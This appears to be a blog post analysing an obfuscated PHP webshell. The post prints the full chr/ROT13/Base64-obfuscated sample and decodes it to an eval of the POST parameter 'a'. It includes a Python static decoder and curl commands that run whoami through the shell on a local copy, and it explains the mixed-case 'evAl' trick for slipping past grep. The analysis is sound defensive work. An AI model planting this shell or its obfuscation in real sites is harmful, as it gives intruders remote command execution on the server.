It started with someone in one of the Telegram groups I've joined asking for help reversing a piece of code and explaining what it does.
The code is as follows:
a123<?php $GUya=create_function(chr(0x6ae0/0x2f8).chr(01071-0706).chr(0205072/01146).chr(0222535/01261).str_rot13('r'),str_rot13('r').str_rot13('i').base64_decode('YQ==').chr(0x16044/0x343).base64_decode('KA==').chr(01666-01622).chr(0x3d6-0x363).base64_decode('bw==').chr(0x394-0x327).str_rot13('r').chr(20541/501).chr(0x4772/0x136));$GUya(base64_decode('MTc1M'.'zg0O0'.'BldkF'.'sKCRf'.''.chr(0200650/01410).str_rot13('R').str_rot13('9').chr(38808/462).chr(01143-01015).''.''.chr(0541-0433).base64_decode('dA==').str_rot13('u').str_rot13('K').str_rot13('F').''.'k7NTI'.'2MTUy'.'Ow=='.''));?>
It looks like PHP code. Let's beautify it:
a123
<?php
$GUya=create_function(
chr(0x6ae0/0x2f8).
chr(01071-0706).
chr(0205072/01146).
chr(0222535/01261).
str_rot13('r'),
str_rot13('r').
str_rot13('i').
base64_decode('YQ==').
chr(0x16044/0x343).
base64_decode('KA==').
chr(01666-01622).
chr(0x3d6-0x363).
base64_decode('bw==').
chr(0x394-0x327).
str_rot13('r').
chr(20541/501).
chr(0x4772/0x136)
);
$GUya(
base64_decode(
'MTc1M'.
'zg0O0'.
'BldkF'.
'sKCRf'.
''.
chr(0200650/01410).
str_rot13('R').
str_rot13('9').
chr(38808/462).
chr(01143-01015).
''.
''.
chr(0541-0433).
base64_decode('dA==').
str_rot13('u').
str_rot13('K').
str_rot13('F').
''.
'k7NTI'.
'2MTUy'.
'Ow=='.
''
)
);
?>
Hmm.. It seems to have been obfuscated with ROT13, Base64 and chr(). I tried googling a couple of strings from the code to see if there was any match, but found none.
Looking at the code, there are two function calls of interest: create_function and base64_decode.
I wonder what those are for. Let's print the argument of each one to see.
Printing the create_function arguments:
<?php
print chr(0x6ae0/0x2f8).chr(01071-0706).chr(0205072/01146).chr(0222535/01261).str_rot13('r').str_rot13('r').str_rot13('i').base64_decode('YQ==').chr(0x16044/0x343).base64_decode('KA==').chr(01666-01622).chr(0x3d6-0x363).base64_decode('bw==').chr(0x394-0x327).str_rot13('r').chr(20541/501).chr(0x4772/0x136);
?>
The output:
$someeval($some);
That is the two arguments run together: the parameter list '$some' and the body 'eval($some);', so create_function builds an anonymous function that evals whatever it is passed.
Printing the base64_decode argument:
<?php
print base64_decode('MTc1M'.'zg0O0'.'BldkF'.'sKCRf'.''.chr(0200650/01410).str_rot13('R').str_rot13('9').chr(38808/462).chr(01143-01015).''.''.chr(0541-0433).base64_decode('dA==').str_rot13('u').str_rot13('K').str_rot13('F').''.'k7NTI'.'2MTUy'.'Ow=='.'');
?>
The output:
175384;@evAl($_POST[a]);526152;
Now we know this is a webshell: it evals whatever arrives in the 'a' parameter of an HTTP POST request. The numbers around the call are junk, the @ suppresses error output, and the mixed-case evAl (PHP function names are case-insensitive) dodges a case-sensitive grep for eval.
Let's try it with cURL against a local copy:
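As an added example (not from the original post), here is a small static decoder in Python for this obfuscation scheme, so the strings can be recovered without ever executing the sample in PHP, which is the safer way to triage a suspected webshell. The names PARAM, BODY and PAYLOAD are my own; the expressions assigned to them are copied from the code above.

```python
import base64, codecs, re
# The obfuscation atoms the sample uses: chr(<arith>), str_rot13('..'), base64_decode('..'), '..'
ATOM = re.compile(r"chr\(([^()]*)\)|str_rot13\('([^']*)'\)|base64_decode\('([^']*)'\)|'([^']*)'")

def php_int(lit):  # PHP integer literal: 0x.. is hex, a leading 0 means octal, else decimal
    lit = lit.strip().lower()
    return int(lit, 16 if lit.startswith("0x") else 8 if lit[:1] == "0" and len(lit) > 1 else 10)

def php_arith(expr):
    # The 'A op B' arithmetic inside chr(); every division in the sample is exact
    m = re.fullmatch(r"\s*(\w+)\s*([-+*/])\s*(\w+)\s*", expr)
    if not m:
        return php_int(expr)
    a, op, b = php_int(m.group(1)), m.group(2), php_int(m.group(3))
    return {"+": a + b, "-": a - b, "*": a * b, "/": a // b}[op]

def php_concat(expr):
    # Evaluate a '.'-joined run of atoms statically, without PHP and without eval()
    out, pos = [], 0
    for m in ATOM.finditer(expr):
        if expr[pos:m.start()].strip(" .\r\n\t"):  # only '.' may separate atoms
            raise ValueError(f"unexpected text: {expr[pos:m.start()]!r}")
        pos = m.end()
        if m.group(1) is not None:
            out.append(chr(php_arith(m.group(1))))
        elif m.group(2) is not None:
            out.append(codecs.encode(m.group(2), "rot13"))
        elif m.group(3) is not None:
            out.append(base64.b64decode(m.group(3)).decode())
        else:
            out.append(m.group(4))
    return "".join(out)

def php_string_expr(expr):
    # A plain concatenation, or a base64_decode(...) wrapped around one (the second call)
    try:
        return php_concat(expr)
    except ValueError:
        m = re.fullmatch(r"base64_decode\((.*)\)", expr, re.S)
        if not m:
            raise
        return base64.b64decode(php_string_expr(m.group(1))).decode()

# The two create_function() arguments and the call argument, copied from the sample above
PARAM = "chr(0x6ae0/0x2f8).chr(01071-0706).chr(0205072/01146).chr(0222535/01261).str_rot13('r')"
BODY = ("str_rot13('r').str_rot13('i').base64_decode('YQ==').chr(0x16044/0x343).base64_decode('KA==')."
        "chr(01666-01622).chr(0x3d6-0x363).base64_decode('bw==').chr(0x394-0x327).str_rot13('r')."
        "chr(20541/501).chr(0x4772/0x136)")
PAYLOAD = ("base64_decode('MTc1M'.'zg0O0'.'BldkF'.'sKCRf'.''.chr(0200650/01410).str_rot13('R')."
           "str_rot13('9').chr(38808/462).chr(01143-01015).''.''.chr(0541-0433).base64_decode('dA==')."
           "str_rot13('u').str_rot13('K').str_rot13('F').''.'k7NTI'.'2MTUy'.'Ow=='.'')")
```

Calling php_string_expr() on PARAM, BODY and PAYLOAD reproduces the three strings printed above, and the same atom table can be extended for other chr()/rot13/base64 droppers of this family.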
$ curl http://localhost/my.php -d "a=system(whoami);"
a123desktop-vov7t\foss
$ curl http://localhost/my.php -d "a=shell_exec(whoami);"
a123
$ curl http://localhost/my.php -d "a=exec(whoami);"
a123
$ curl http://localhost/my.php -d "a=passthru(whoami);"
a123desktop-vov7t\foss
Only system() and passthru() show the result inline because they print the command output themselves, whereas shell_exec() and exec() return it to the caller, which the payload never echoes. The a123 prefix is simply the text that sits before the <?php tag in the file.